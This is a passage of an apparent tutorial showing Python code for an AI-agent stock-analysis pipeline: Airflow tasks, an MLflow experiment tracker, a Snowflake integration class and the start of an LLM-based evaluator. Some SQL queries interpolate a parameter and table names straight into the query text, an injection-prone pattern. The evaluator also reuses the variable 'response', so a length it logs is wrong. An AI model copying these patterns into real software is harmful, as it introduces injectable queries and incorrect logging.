451 {"role": "system", "content": "You are a financial data extraction specialist. Extract structured data from financial analysis reports."},
452 {"role": "user", "content": f"Extract the key structured data from this financial report in JSON format. Include market_overview, stock_analyses (with individual metrics for each stock), key_insights, and recommendations:\n\n{final_report}"}
453 ],
454 response_format={"type": "json_object"}
455 )
456
457 structured_report = json.loads(structure_response.choices[0].message.content)
458 except Exception as e:
459 # Fall back to simple structure if extraction fails
460 structured_report = {
461 "report_text": final_report,
462 "report_type": report_type,
463 "analysis_date": analysis_data['date'],
464 "symbols": analysis_data['symbols']
465 }
466
467 # Combine structured report with raw text
468 final_result = {
469 "structured_data": structured_report,
470 "full_report": final_report,
471 "report_type": report_type,
472 "analysis_date": analysis_data['date'],
473 "symbols_analyzed": analysis_data['symbols'],
474 "generation_metadata": {
475 "timestamp": datetime.datetime.now().isoformat(),
476 "model": "gpt-4-turbo",
477 "agent_framework": "AutoGen"
478 }
479 }
480
481 # Log with MLflow if enabled
482 try:
483 mlflow.start_run(run_name=f"financial_analysis_{analysis_data['date']}")
484
485 # Log parameters
486 mlflow.log_params({
487 "analysis_date": analysis_data['date'],
488 "symbols": ",".join(analysis_data['symbols']),
489 "report_type": report_type,
490 "include_sentiment": params.get('include_sentiment')
491 })
492
493 # Log metrics if available
494 if 'structured_data' in final_result and 'stock_analyses' in final_result['structured_data']:
495 for symbol, analysis in final_result['structured_data']['stock_analyses'].items():
496 if isinstance(analysis, dict):
497 for metric, value in analysis.items():
498 if isinstance(value, (int, float)):
499 mlflow.log_metric(f"{symbol}_{metric}", value)
500
501 # Log report as artifact
502 with tempfile.NamedTemporaryFile(mode='w', suffix='.txt', delete=False) as f:
503 f.write(final_report)
504 report_path = f.name
505
506 mlflow.log_artifact(report_path)
507 os.unlink(report_path)
508
509 # Log raw data sample
510 with tempfile.NamedTemporaryFile(mode='w', suffix='.json', delete=False) as f:
511 json.dump(analysis_data, f)
512 data_path = f.name
513
514 mlflow.log_artifact(data_path)
515 os.unlink(data_path)
516
517 mlflow.end_run()
518 except Exception as e:
519 print(f"Error logging to MLflow: {e}")
520
521 # Save to XCom for next task
522 context['ti'].xcom_push(key='analysis_results', value=final_result)
523
524 return final_result
525
526def store_results(**context):
527 """Store analysis results in Snowflake."""
528 # Get analysis results
529 analysis_results = context['ti'].xcom_pull(task_ids='run_analysis_agents', key='analysis_results')
530 params = context['params']
531 analysis_date = params.get('analysis_date')
532
533 # Store in Snowflake
534 storage_result = store_analysis_results(analysis_results, analysis_date)
535
536 # Generate report file in S3 via Snowflake (optional)
537 conn = get_snowflake_connection()
538 cursor = conn.cursor()
539
540 report_file_query = f"""
541 COPY INTO @FINANCE.REPORTS.REPORT_STAGE/financial_reports/
542 FROM (
543 SELECT
544 OBJECT_CONSTRUCT('report', full_report, 'metadata', generation_metadata, 'date', analysis_date) AS report_json
545 FROM
546 FINANCE.REPORTS.AGENT_ANALYSIS_RESULTS
547 WHERE
548 analysis_date = '{analysis_date}'
549 ORDER BY
550 created_at DESC
551 LIMIT 1
552 )
553 FILE_FORMAT = (TYPE = JSON)
554 OVERWRITE = TRUE
555 SINGLE = TRUE
556 HEADER = TRUE;
557 """
558
559 cursor.execute(report_file_query)
560 file_result = cursor.fetchall()
561 cursor.close()
562 conn.close()
563
564 # Return combined results
565 result = {
566 'snowflake_storage': storage_result,
567 'report_file': file_result
568 }
569
570 return result
571
572def notify_stakeholders(**context):
573 """Send notification about completed analysis."""
574 # Get parameters and results
575 params = context['params']
576 analysis_date = params.get('analysis_date')
577 stock_symbols = json.loads(params.get('stock_symbols'))
578 analysis_results = context['ti'].xcom_pull(task_ids='run_analysis_agents', key='analysis_results')
579
580 # Extract key insights if available
581 key_insights = []
582 if ('structured_data' in analysis_results and
583 'key_insights' in analysis_results['structured_data']):
584 if isinstance(analysis_results['structured_data']['key_insights'], list):
585 key_insights = analysis_results['structured_data']['key_insights']
586 elif isinstance(analysis_results['structured_data']['key_insights'], str):
587 key_insights = [analysis_results['structured_data']['key_insights']]
588
589 # Build notification content
590 notification = {
591 'title': f"Financial Analysis Report - {analysis_date}",
592 'date': analysis_date,
593 'symbols': stock_symbols,
594 'key_insights': key_insights[:3], # Just top 3 insights
595 'report_url': f"https://analytics.example.com/reports/finance/{analysis_date.replace('-', '')}.html",
596 'snowflake_table': "FINANCE.REPORTS.AGENT_ANALYSIS_RESULTS"
597 }
598
599 # Log notification (in production, would actually send via email/Slack)
600 print(f"Would send notification: {json.dumps(notification, indent=2)}")
601
602 # Return notification content
603 return notification
604
605# Define DAG tasks
606extract_task = PythonOperator(
607 task_id='extract_data',
608 python_callable=extract_data,
609 provide_context=True,
610 dag=dag,
611)
612
613analysis_task = PythonOperator(
614 task_id='run_analysis_agents',
615 python_callable=run_analysis_agents,
616 provide_context=True,
617 dag=dag,
618)
619
620store_task = PythonOperator(
621 task_id='store_results',
622 python_callable=store_results,
623 provide_context=True,
624 dag=dag,
625)
626
627notify_task = PythonOperator(
628 task_id='notify_stakeholders',
629 python_callable=notify_stakeholders,
630 provide_context=True,
631 dag=dag,
632)
633
634# Set task dependencies
635extract_task >> analysis_task >> store_task >> notify_task

For tracking experiments and agent performance, let's implement an MLflow tracking component:

python
1# mlflow_tracking.py
2import os
3import json
4import mlflow
5import datetime
6import pandas as pd
7from typing import Dict, Any, List, Optional
8
9class AIAgentExperimentTracker:
10 """Track AI agent experiments with MLflow."""
11
12 def __init__(
13 self,
14 experiment_name: str,
15 tracking_uri: Optional[str] = None,
16 tags: Optional[Dict[str, str]] = None
17 ):
18 """
19 Initialize the experiment tracker.
20
21 Args:
22 experiment_name: Name of the MLflow experiment
23 tracking_uri: Optional URI for MLflow tracking server
24 tags: Optional tags for the experiment
25 """
26 self.experiment_name = experiment_name
27
28 # Set tracking URI if provided
29 if tracking_uri:
30 mlflow.set_tracking_uri(tracking_uri)
31
32 # Set default tags
33 self.default_tags = tags or {}
34
35 # Get or create experiment
36 try:
37 self.experiment = mlflow.get_experiment_by_name(experiment_name)
38 if not self.experiment:
39 self.experiment_id = mlflow.create_experiment(
40 experiment_name,
41 tags=self.default_tags
42 )
43 else:
44 self.experiment_id = self.experiment.experiment_id
45 except Exception as e:
46 print(f"Error initializing MLflow experiment: {e}")
47 self.experiment_id = None
48
49 def start_run(
50 self,
51 run_name: Optional[str] = None,
52 tags: Optional[Dict[str, str]] = None,
53 agent_config: Optional[Dict[str, Any]] = None
54 ) -> str:
55 """
56 Start a new MLflow run.
57
58 Args:
59 run_name: Optional name for the run
60 tags: Optional tags for the run
61 agent_config: Optional agent configuration to log
62
63 Returns:
64 str: MLflow run ID
65 """
66 # Generate default run name if not provided
67 if not run_name:
68 run_name = f"agent_run_{datetime.datetime.now().strftime('%Y%m%d_%H%M%S')}"
69
70 # Combine default tags with run-specific tags
71 run_tags = {**self.default_tags, **(tags or {})}
72
73 try:
74 # Start the run
75 mlflow.start_run(
76 experiment_id=self.experiment_id,
77 run_name=run_name,
78 tags=run_tags
79 )
80
81 # Log agent configuration if provided
82 if agent_config:
83 # Log nested dictionaries as separate params for better organization
84 self._log_nested_params("agent", agent_config)
85
86 # Also log the raw config as JSON artifact for preservation
87 config_path = f"/tmp/agent_config_{datetime.datetime.now().strftime('%Y%m%d_%H%M%S')}.json"
88 with open(config_path, 'w') as f:
89 json.dump(agent_config, f, indent=2)
90
91 mlflow.log_artifact(config_path)
92 os.remove(config_path)
93
94 return mlflow.active_run().info.run_id
95
96 except Exception as e:
97 print(f"Error starting MLflow run: {e}")
98 return None
99
100 def log_agent_interaction(
101 self,
102 agent_name: str,
103 prompt: str,
104 response: str,
105 metrics: Optional[Dict[str, float]] = None,
106 metadata: Optional[Dict[str, Any]] = None
107 ):
108 """
109 Log an agent interaction.
110
111 Args:
112 agent_name: Name of the agent
113 prompt: Prompt sent to agent
114 response: Agent response
115 metrics: Optional metrics for the interaction
116 metadata: Optional metadata about the interaction
117 """
118 try:
119 # Ensure we have an active run
120 if not mlflow.active_run():
121 self.start_run(f"{agent_name}_interactions")
122
123 # Log metrics if provided
124 if metrics:
125 for key, value in metrics.items():
126 if isinstance(value, (int, float)):
127 mlflow.log_metric(f"{agent_name}_{key}", value)
128
129 # Log metadata as parameters
130 if metadata:
131 flat_metadata = self._flatten_dict(metadata)
132 for key, value in flat_metadata.items():
133 if isinstance(value, (str, int, float, bool)):
134 mlflow.log_param(f"{agent_name}_{key}", value)
135
136 # Log the interaction as text
137 interaction_path = f"/tmp/{agent_name}_interaction_{datetime.datetime.now().strftime('%Y%m%d_%H%M%S')}.txt"
138 with open(interaction_path, 'w') as f:
139 f.write(f"PROMPT:\n{prompt}\n\nRESPONSE:\n{response}")
140
141 mlflow.log_artifact(interaction_path, artifact_path=f"interactions/{agent_name}")
142 os.remove(interaction_path)
143
144 except Exception as e:
145 print(f"Error logging agent interaction: {e}")
146
147 def log_agent_evaluation(
148 self,
149 evaluations: Dict[str, Any],
150 metrics: Optional[Dict[str, float]] = None
151 ):
152 """
153 Log agent evaluation results.
154
155 Args:
156 evaluations: Evaluation results
157 metrics: Additional metrics to log
158 """
159 try:
160 # Ensure we have an active run
161 if not mlflow.active_run():
162 self.start_run("agent_evaluation")
163
164 # Log evaluation metrics
165 if metrics:
166 for key, value in metrics.items():
167 if isinstance(value, (int, float)):
168 mlflow.log_metric(key, value)
169
170 # Log structured evaluations
171 evaluation_path = f"/tmp/evaluation_{datetime.datetime.now().strftime('%Y%m%d_%H%M%S')}.json"
172 with open(evaluation_path, 'w') as f:
173 json.dump(evaluations, f, indent=2)
174
175 mlflow.log_artifact(evaluation_path, artifact_path="evaluations")
176 os.remove(evaluation_path)
177
178 # If evaluations contain numeric scores, log as metrics
179 flat_evals = self._flatten_dict(evaluations)
180 for key, value in flat_evals.items():
181 if isinstance(value, (int, float)):
182 mlflow.log_metric(f"eval_{key}", value)
183
184 except Exception as e:
185 print(f"Error logging agent evaluation: {e}")
186
187 def log_output_data(
188 self,
189 data: Any,
190 output_format: str = "json",
191 name: Optional[str] = None
192 ):
193 """
194 Log output data from an agent run.
195
196 Args:
197 data: Data to log
198 output_format: Format to use (json, csv, txt)
199 name: Optional name for the output
200 """
201 try:
202 # Ensure we have an active run
203 if not mlflow.active_run():
204 self.start_run("agent_output")
205
206 if name is None:
207 name = f"output_{datetime.datetime.now().strftime('%Y%m%d_%H%M%S')}"
208
209 # Process based on format
210 if output_format == "json":
211 output_path = f"/tmp/{name}.json"
212 with open(output_path, 'w') as f:
213 if isinstance(data, str):
214 f.write(data)
215 else:
216 json.dump(data, f, indent=2, default=str)
217
218 elif output_format == "csv":
219 output_path = f"/tmp/{name}.csv"
220 if isinstance(data, pd.DataFrame):
221 data.to_csv(output_path, index=False)
222 elif isinstance(data, list) and all(isinstance(x, dict) for x in data):
223 pd.DataFrame(data).to_csv(output_path, index=False)
224 else:
225 raise ValueError("Data must be DataFrame or list of dicts for CSV format")
226
227 elif output_format == "txt":
228 output_path = f"/tmp/{name}.txt"
229 with open(output_path, 'w') as f:
230 f.write(str(data))
231
232 else:
233 raise ValueError(f"Unsupported output format: {output_format}")
234
235 # Log the artifact
236 mlflow.log_artifact(output_path, artifact_path="outputs")
237 os.remove(output_path)
238
239 except Exception as e:
240 print(f"Error logging output data: {e}")
241
242 def end_run(self):
243 """End the current MLflow run."""
244 try:
245 if mlflow.active_run():
246 mlflow.end_run()
247 except Exception as e:
248 print(f"Error ending MLflow run: {e}")
249
250 def _log_nested_params(self, prefix, params_dict):
251 """Log nested parameters with prefixed keys."""
252 flat_params = self._flatten_dict(params_dict, prefix)
253 for key, value in flat_params.items():
254 if isinstance(value, (str, int, float, bool)):
255 mlflow.log_param(key, value)
256
257 def _flatten_dict(self, d, parent_key='', sep='_'):
258 """Flatten nested dictionaries for parameter logging."""
259 items = []
260 for k, v in d.items():
261 new_key = f"{parent_key}{sep}{k}" if parent_key else k
262 if isinstance(v, dict):
263 items.extend(self._flatten_dict(v, new_key, sep=sep).items())
264 else:
265 items.append((new_key, v))
266 return dict(items)
267
268# Example usage
269if __name__ == "__main__":
270 # Initialize tracker
271 tracker = AIAgentExperimentTracker(
272 experiment_name="financial_analysis_agents",
273 tags={"domain": "finance", "purpose": "stock_analysis"}
274 )
275
276 # Start a run
277 run_id = tracker.start_run(
278 run_name="daily_market_analysis",
279 tags={"stocks": "AAPL,MSFT,GOOGL", "date": "2023-09-15"},
280 agent_config={
281 "agent_types": ["FinancialAnalyst", "DataScientist", "ReportWriter"],
282 "models": {
283 "primary": "gpt-4-turbo",
284 "fallback": "gpt-3.5-turbo"
285 },
286 "temperature": 0.2
287 }
288 )
289
290 # Log sample interaction
291 tracker.log_agent_interaction(
292 agent_name="FinancialAnalyst",
293 prompt="Analyze AAPL performance on 2023-09-15",
294 response="Apple (AAPL) closed at $175.62, down 0.8% from previous close...",
295 metrics={
296 "tokens": 250,
297 "response_time": 0.85,
298 "cost": 0.02
299 },
300 metadata={
301 "model": "gpt-4-turbo",
302 "temperature": 0.2
303 }
304 )
305
306 # Log evaluation
307 tracker.log_agent_evaluation(
308 evaluations={
309 "accuracy": 0.92,
310 "completeness": 0.88,
311 "reasoning": 0.90,
312 "usefulness": 0.85,
313 "detailed_scores": {
314 "factual_accuracy": 0.95,
315 "calculation_accuracy": 0.89,
316 "insight_quality": 0.87
317 }
318 },
319 metrics={
320 "overall_quality": 0.89,
321 "execution_time": 12.5
322 }
323 )
324
325 # Log output
326 tracker.log_output_data(
327 {
328 "report": "Financial Analysis Report - 2023-09-15",
329 "stocks_analyzed": ["AAPL", "MSFT", "GOOGL"],
330 "key_insights": [
331 "Tech sector showed weakness with average decline of 0.7%",
332 "AAPL volume 15% above 30-day average despite price decline",
333 "MSFT outperformed peers with 0.2% gain"
334 ]
335 },
336 output_format="json",
337 name="financial_report"
338 )
339
340 # End the run
341 tracker.end_run()

Let's also create a Snowflake integration component for enterprise data management:

python
1# snowflake_integration.py
2import os
3import json
4import pandas as pd
5import snowflake.connector
6from snowflake.connector.pandas_tools import write_pandas
7from typing import Dict, Any, List, Optional, Union
8
9class SnowflakeAgentIntegration:
10 """Integration with Snowflake for AI agent data pipelines."""
11
12 def __init__(
13 self,
14 account: str,
15 user: str,
16 password: str = None,
17 database: str = None,
18 schema: str = None,
19 warehouse: str = None,
20 role: str = None,
21 authenticator: str = None,
22 private_key_path: str = None,
23 private_key_passphrase: str = None
24 ):
25 """
26 Initialize Snowflake connection parameters.
27
28 Args:
29 account: Snowflake account identifier
30 user: Snowflake username
31 password: Optional password (use private key or SSO instead for production)
32 database: Default database
33 schema: Default schema
34 warehouse: Compute warehouse
35 role: Snowflake role
36 authenticator: Authentication method (e.g., 'externalbrowser' for SSO)
37 private_key_path: Path to private key file for key-pair authentication
38 private_key_passphrase: Passphrase for private key if encrypted
39 """
40 self.account = account
41 self.user = user
42 self.password = password
43 self.database = database
44 self.schema = schema
45 self.warehouse = warehouse
46 self.role = role
47 self.authenticator = authenticator
48 self.private_key_path = private_key_path
49 self.private_key_passphrase = private_key_passphrase
50
51 # Initialize connection as None
52 self.conn = None
53
54 def connect(self):
55 """Establish connection to Snowflake."""
56 try:
57 # Prepare connection parameters
58 connect_params = {
59 "account": self.account,
60 "user": self.user,
61 "database": self.database,
62 "schema": self.schema,
63 "warehouse": self.warehouse,
64 "role": self.role
65 }
66
67 # Add authentication method
68 if self.password:
69 connect_params["password"] = self.password
70 elif self.authenticator:
71 connect_params["authenticator"] = self.authenticator
72 elif self.private_key_path:
73 with open(self.private_key_path, "rb") as key:
74 p_key = key.read()
75 if self.private_key_passphrase:
76 connect_params["private_key"] = p_key
77 connect_params["private_key_passphrase"] = self.private_key_passphrase
78 else:
79 connect_params["private_key"] = p_key
80
81 # Remove None values
82 connect_params = {k: v for k, v in connect_params.items() if v is not None}
83
84 # Establish connection
85 self.conn = snowflake.connector.connect(**connect_params)
86
87 return self.conn
88
89 except Exception as e:
90 print(f"Error connecting to Snowflake: {e}")
91 raise
92
93 def execute_query(self, query: str, params: Dict[str, Any] = None) -> List[Dict[str, Any]]:
94 """
95 Execute a SQL query and return results as list of dictionaries.
96
97 Args:
98 query: SQL query to execute
99 params: Optional query parameters
100
101 Returns:
102 List of dictionaries with query results
103 """
104 try:
105 # Connect if not already connected
106 if not self.conn:
107 self.connect()
108
109 # Create cursor and execute query
110 cursor = self.conn.cursor(snowflake.connector.DictCursor)
111
112 if params:
113 cursor.execute(query, params)
114 else:
115 cursor.execute(query)
116
117 # Fetch results
118 results = cursor.fetchall()
119
120 # Close cursor
121 cursor.close()
122
123 return results
124
125 except Exception as e:
126 print(f"Error executing query: {e}")
127 raise
128
129 def query_to_dataframe(self, query: str, params: Dict[str, Any] = None) -> pd.DataFrame:
130 """
131 Execute a SQL query and return results as Pandas DataFrame.
132
133 Args:
134 query: SQL query to execute
135 params: Optional query parameters
136
137 Returns:
138 Pandas DataFrame with query results
139 """
140 try:
141 # Connect if not already connected
142 if not self.conn:
143 self.connect()
144
145 # Execute query directly to DataFrame
146 if params:
147 df = pd.read_sql(query, self.conn, params=params)
148 else:
149 df = pd.read_sql(query, self.conn)
150
151 return df
152
153 except Exception as e:
154 print(f"Error executing query to DataFrame: {e}")
155 raise
156
157 def upload_dataframe(
158 self,
159 df: pd.DataFrame,
160 table_name: str,
161 schema: Optional[str] = None,
162 database: Optional[str] = None,
163 chunk_size: Optional[int] = None,
164 auto_create_table: bool = False
165 ) -> Dict[str, Any]:
166 """
167 Upload a Pandas DataFrame to Snowflake table.
168
169 Args:
170 df: DataFrame to upload
171 table_name: Destination table name
172 schema: Optional schema (overrides default)
173 database: Optional database (overrides default)
174 chunk_size: Optional chunk size for large uploads
175 auto_create_table: Whether to automatically create table if it doesn't exist
176
177 Returns:
178 Dictionary with upload results
179 """
180 try:
181 # Connect if not already connected
182 if not self.conn:
183 self.connect()
184
185 # Use default schema/database if not specified
186 schema = schema or self.schema
187 database = database or self.database
188
189 # Create fully qualified table name
190 qualified_table_name = f"{database}.{schema}.{table_name}" if database and schema else table_name
191
192 # Check if table exists
193 if auto_create_table:
194 self._ensure_table_exists(df, qualified_table_name)
195
196 # Upload DataFrame
197 success, num_chunks, num_rows, output = write_pandas(
198 conn=self.conn,
199 df=df,
200 table_name=table_name,
201 schema=schema,
202 database=database,
203 chunk_size=chunk_size,
204 quote_identifiers=True
205 )
206
207 return {
208 "success": success,
209 "chunks": num_chunks,
210 "rows": num_rows,
211 "output": output,
212 "table": qualified_table_name
213 }
214
215 except Exception as e:
216 print(f"Error uploading DataFrame: {e}")
217 raise
218
219 def upload_json(
220 self,
221 data: Union[Dict[str, Any], List[Dict[str, Any]]],
222 table_name: str,
223 schema: Optional[str] = None,
224 database: Optional[str] = None,
225 flatten: bool = False
226 ) -> Dict[str, Any]:
227 """
228 Upload JSON data to Snowflake table.
229
230 Args:
231 data: Dictionary or list of dictionaries to upload
232 table_name: Destination table name
233 schema: Optional schema (overrides default)
234 database: Optional database (overrides default)
235 flatten: Whether to flatten nested structures
236
237 Returns:
238 Dictionary with upload results
239 """
240 try:
241 # Convert to DataFrame based on data type
242 if isinstance(data, dict):
243 if flatten:
244 # Flatten nested dict
245 flat_data = self._flatten_json(data)
246 df = pd.DataFrame([flat_data])
247 else:
248 # Convert single dict to DataFrame with one row
249 df = pd.DataFrame([data])
250 elif isinstance(data, list) and all(isinstance(item, dict) for item in data):
251 if flatten:
252 # Flatten each dict in the list
253 flat_list = [self._flatten_json(item) for item in data]
254 df = pd.DataFrame(flat_list)
255 else:
256 # Convert list of dicts directly to DataFrame
257 df = pd.DataFrame(data)
258 else:
259 raise ValueError("Data must be a dictionary or list of dictionaries")
260
261 # Handle nested JSON structures by converting to strings
262 for col in df.columns:
263 if isinstance(df[col].iloc[0], (dict, list)):
264 df[col] = df[col].apply(lambda x: json.dumps(x))
265
266 # Upload the DataFrame
267 return self.upload_dataframe(
268 df=df,
269 table_name=table_name,
270 schema=schema,
271 database=database,
272 auto_create_table=True
273 )
274
275 except Exception as e:
276 print(f"Error uploading JSON: {e}")
277 raise
278
279 def store_agent_results(
280 self,
281 agent_results: Dict[str, Any],
282 metadata: Dict[str, Any],
283 table_name: str = "AGENT_RESULTS",
284 schema: Optional[str] = None,
285 database: Optional[str] = None
286 ) -> Dict[str, Any]:
287 """
288 Store AI agent results with metadata in Snowflake.
289
290 Args:
291 agent_results: Results from AI agent
292 metadata: Metadata about the agent run
293 table_name: Destination table name
294 schema: Optional schema (overrides default)
295 database: Optional database (overrides default)
296
297 Returns:
298 Dictionary with upload results
299 """
300 try:
301 # Prepare combined data
302 combined_data = {
303 "results": json.dumps(agent_results),
304 "metadata": json.dumps(metadata),
305 "created_at": pd.Timestamp.now()
306 }
307
308 # Add metadata fields as top-level columns for easier querying
309 for key, value in metadata.items():
310 if isinstance(value, (str, int, float, bool)) or value is None:
311 combined_data[f"meta_{key}"] = value
312
313 # Upload to Snowflake
314 df = pd.DataFrame([combined_data])
315 return self.upload_dataframe(
316 df=df,
317 table_name=table_name,
318 schema=schema,
319 database=database,
320 auto_create_table=True
321 )
322
323 except Exception as e:
324 print(f"Error storing agent results: {e}")
325 raise
326
327 def close(self):
328 """Close the Snowflake connection."""
329 if self.conn:
330 self.conn.close()
331 self.conn = None
332
333 def _ensure_table_exists(self, df: pd.DataFrame, table_name: str):
334 """
335 Create table if it doesn't exist based on DataFrame structure.
336
337 Args:
338 df: DataFrame to use for table schema
339 table_name: Fully qualified table name
340 """
341 try:
342 # Check if table exists
343 check_query = f"SHOW TABLES LIKE '{table_name.split('.')[-1]}'"
344 if '.' in table_name:
345 parts = table_name.split('.')
346 if len(parts) == 3:
347 check_query = f"SHOW TABLES LIKE '{parts[2]}' IN SCHEMA {parts[0]}.{parts[1]}"
348
349 cursor = self.conn.cursor()
350 cursor.execute(check_query)
351 table_exists = cursor.fetchone() is not None
352
353 if not table_exists:
354 # Generate CREATE TABLE statement based on DataFrame
355 columns = []
356 for col_name, dtype in zip(df.columns, df.dtypes):
357 if pd.api.types.is_integer_dtype(dtype):
358 col_type = "INTEGER"
359 elif pd.api.types.is_float_dtype(dtype):
360 col_type = "FLOAT"
361 elif pd.api.types.is_bool_dtype(dtype):
362 col_type = "BOOLEAN"
363 elif pd.api.types.is_datetime64_dtype(dtype):
364 col_type = "TIMESTAMP_NTZ"
365 else:
366 # Check if column contains JSON
367 if df[col_name].iloc[0] and isinstance(df[col_name].iloc[0], str):
368 try:
369 json.loads(df[col_name].iloc[0])
370 col_type = "VARIANT" # For JSON data
371 except:
372 col_type = "VARCHAR"
373 else:
374 col_type = "VARCHAR"
375
376 columns.append(f'"{col_name}" {col_type}')
377
378 # Create the table
379 create_query = f"CREATE TABLE IF NOT EXISTS {table_name} ({', '.join(columns)})"
380 cursor.execute(create_query)
381
382 cursor.close()
383
384 except Exception as e:
385 print(f"Error creating table: {e}")
386 raise
387
388 def _flatten_json(self, d: Dict[str, Any], parent_key: str = '', sep: str = '_') -> Dict[str, Any]:
389 """
390 Flatten nested JSON structures.
391
392 Args:
393 d: Dictionary to flatten
394 parent_key: Parent key for recursive calls
395 sep: Separator for nested keys
396
397 Returns:
398 Flattened dictionary
399 """
400 items = []
401 for k, v in d.items():
402 new_key = f"{parent_key}{sep}{k}" if parent_key else k
403
404 if isinstance(v, dict):
405 items.extend(self._flatten_json(v, new_key, sep=sep).items())
406 elif isinstance(v, list):
407 # Convert lists to JSON strings
408 items.append((new_key, json.dumps(v)))
409 else:
410 items.append((new_key, v))
411
412 return dict(items)

Let's also implement an agent evaluation component:

python
1# agent_evaluation.py
2import json
3import pandas as pd
4import numpy as np
5import openai
6from typing import Dict, Any, List, Optional, Union, Tuple
7
8class AgentEvaluator:
9 """Evaluate AI agents for quality, correctness, and performance."""
10
11 def __init__(self, openai_api_key: str):
12 """
13 Initialize the evaluator.
14
15 Args:
16 openai_api_key: OpenAI API key for evaluation
17 """
18 self.openai_client = openai.OpenAI(api_key=openai_api_key)
19
20 def evaluate_agent_output(
21 self,
22 prompt: str,
23 response: str,
24 ground_truth: Optional[str] = None,
25 criteria: Optional[List[str]] = None
26 ) -> Dict[str, Any]:
27 """
28 Evaluate an agent's response against criteria and optionally ground truth.
29
30 Args:
31 prompt: The original prompt given to the agent
32 response: The agent's response
33 ground_truth: Optional ground truth for factual comparison
34 criteria: Optional evaluation criteria
35
36 Returns:
37 Dictionary with evaluation scores and feedback
38 """
39 if criteria is None:
40 criteria = [
41 "accuracy",
42 "completeness",
43 "relevance",
44 "coherence",
45 "conciseness"
46 ]
47
48 # Construct evaluation prompt
49 eval_prompt = f"""Evaluate the following AI assistant response to a user prompt.
50
51USER PROMPT:
52{prompt}
53
54AI RESPONSE:
55{response}
56
57"""
58 if ground_truth:
59 eval_prompt += f"""
60GROUND TRUTH (for factual comparison):
61{ground_truth}
62
63"""
64
65 eval_prompt += f"""
66Please evaluate the response on the following criteria on a scale of 1-10:
67{', '.join(criteria)}
68
69Provide an explanation for each score and give specific examples from the response.
70Then provide an overall score (1-10) and a brief summary of the evaluation.
71
72Format your response as a JSON object with the following structure:
73{{
74 "criteria_scores": {{
75 "criterion1": {{
76 "score": X,
77 "explanation": "Your explanation"
78 }},
79 ...
80 }},
81 "overall_score": X,
82 "summary": "Your summary",
83 "strengths": ["strength1", "strength2", ...],
84 "weaknesses": ["weakness1", "weakness2", ...]
85}}
86"""
87
88 try:
89 # Get evaluation from OpenAI
90 response = self.openai_client.chat.completions.create(
91 model="gpt-4-turbo",
92 messages=[
93 {"role": "system", "content": "You are an objective evaluator of AI assistant responses. Provide fair, balanced, and detailed evaluations."},
94 {"role": "user", "content": eval_prompt}
95 ],
96 response_format={"type": "json_object"},
97 temperature=0.2
98 )
99
100 # Parse the result
101 evaluation = json.loads(response.choices[0].message.content)
102
103 # Add metadata
104 evaluation["evaluation_metadata"] = {
105 "model": "gpt-4-turbo",
106 "prompt_length": len(prompt),
107 "response_length": len(response),
108 "criteria_evaluated": criteria
109 }
110
111 return evaluation
112
113 except Exception as e:
114 print(f"Error evaluating agent output: {e}")
115 return {
116 "error": str(e),
117 "criteria_scores": {c: {"score": 0, "explanation": "Evaluation failed"} for c in criteria},
118 "overall_score": 0,
119 "summary": f"Evaluation failed: {str(e)}"
120 }
121
122 def evaluate_factual_accuracy(
123 self,
124 response: str,
125 ground_truth: str
126 ) -> Dict[str, Any]:
127 """
128 Evaluate the factual accuracy of an agent's response.
129
130 Args:
131 response: The agent's response
132 ground_truth: The ground truth for comparison
133
134 Returns:
135 Dictionary with accuracy scores and details
136 """
137 try:
138 # Construct evaluation prompt
139 eval_prompt = f"""Evaluate the factual accuracy of the following AI response compared to the ground truth.
140
141AI RESPONSE:
142{response}
143
144GROUND TRUTH:
145{ground_truth}
146
147Identify all factual statements in the AI response and check if they are:
1481. Correct (matches ground truth)
1492. Incorrect (contradicts ground truth)
1503. Unverifiable (not mentioned in ground truth)
151
152For each factual claim, provide:
1531. The claim from the AI response
1542. Whether it's correct, incorrect, or unverifiable
1553. The relevant ground truth information (if applicable)
156
157Then calculate:
1581. Accuracy rate (correct claims / total verifiable claims)
1592. Error rate (incorrect claims / total verifiable claims)
1603. Hallucination rate (unverifiable claims / total claims)
161
162Format your response as a JSON object with the following structure:
163{{
164 "factual_claims": [
165 {{
166 "claim": "The claim text",
167 "assessment": "correct|incorrect|unverifiable",
168 "ground_truth_reference": "Relevant ground truth text or null",
169 "explanation": "Explanation of assessment"
170 }},
171 ...
172 ],
173 "metrics": {{
174 "total_claims": X,
175 "correct_claims": X,
176 "incorrect_claims": X,
177 "unverifiable_claims": X,
178 "accuracy_rate": X.XX,
179 "error_rate": X.XX,
180 "hallucination_rate": X.XX
181 }},
182 "summary": "Overall assessment of factual accuracy"
183}}
184"""
185
186 # Get evaluation from OpenAI
187 response = self.openai_client.chat.completions.create(
188 model="gpt-4-turbo",
189 messages=[
190 {"role": "system", "content": "You are an expert fact-checker who carefully evaluates the factual accuracy of information."},
191 {"role": "user", "content": eval_prompt}
192 ],
193 response_format={"type": "json_object"},
194 temperature=0.1
195 )
196
197 # Parse the result
198 evaluation = json.loads(response.choices[0].message.content)
199
200 return evaluation
201
202 except Exception as e:
203 print(f"Error evaluating factual accuracy: {e}")
204 return {
205 "error": str(e),
206 "metrics": {
207 "accuracy_rate": 0,
208 "error_rate": 0,
209 "hallucination_rate": 0
210 },
211 "summary": f"Evaluation failed: {str(e)}"
212 }
213
214 def evaluate_multi_agent_workflow(
215 self,
216 task_description: str,
217 agent_interactions: List[Dict[str, Any]],
218 final_output: str,
219 expected_output: Optional[str] = None
220 ) -> Dict[str, Any]:
221 """
222 Evaluate a multi-agent workflow.
223
224 Args:
225 task_description: The original task
226 agent_interactions: List of agent interactions in the workflow
227 final_output: The final output of the workflow
228 expected_output: Optional expected output for comparison
229
230 Returns:
231 Dictionary with workflow evaluation
232 """
233 try:
234 # Format agent interactions for evaluation
235 interactions_text = ""
236 for i, interaction in enumerate(agent_interactions, 1):
237 agent_name = interaction.get("agent_name", f"Agent {i}")
238 prompt = interaction.get("prompt", "")
239 response = interaction.get("response", "")
240
241 interactions_text += f"\n--- INTERACTION {i} ---\n"
242 interactions_text += f"AGENT: {agent_name}\n"
243 interactions_text += f"PROMPT:\n{prompt}\n\n"
244 interactions_text += f"RESPONSE:\n{response}\n"
245
246 # Construct evaluation prompt
247 eval_prompt = f"""Evaluate this multi-agent workflow for completing a task.
248
249TASK DESCRIPTION:
250{task_description}
251
252AGENT INTERACTIONS:
253{interactions_text}
254
255FINAL OUTPUT:
256{final_output}
257
258"""
259 if expected_output:
260 eval_prompt += f"""
261EXPECTED OUTPUT:
262{expected_output}
263
264"""
265
266 eval_prompt += """
267Evaluate the workflow on these criteria:
